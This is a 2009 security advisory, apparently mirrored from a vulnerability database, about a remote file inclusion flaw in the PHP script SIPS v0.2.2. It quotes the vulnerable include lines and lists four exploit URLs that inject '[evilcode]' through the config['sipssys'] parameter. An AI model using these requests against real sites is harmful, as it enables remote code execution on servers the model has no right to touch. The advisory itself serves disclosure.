Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22105
HistoryJun 30, 2009 - 12:00 a.m.

SIPS v0.2.2 Remote File Inclusion Vulnerability

2009-06-3000:00:00
vulners.com
1458

/===============================================================================================================================================\
|
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability
|
| Software : SIPS v0.2.2
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
| Author : Cru3l.b0y
| |
| Home : WwW.DeltaHacking.Net

|===============================================================================================================================================|
|
| [o] Vulnerable file
|
| search.php
|
| include $config["sipssys"] ."/code/news.inc.php";
|
|
| readmore.php
|
| include $config["sipssys"] ."/code/news.inc.php";
|
| index.php
|
| include $config["sipssys"] ."/code/news.inc.php";
| include $config["sipssys"] ."/code/box.inc.php";
|
| search/submit.php
|
| include $config["sipssys"] ."/code/search.inc.php";
|
|
|
| [o] Exploit
|
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]
|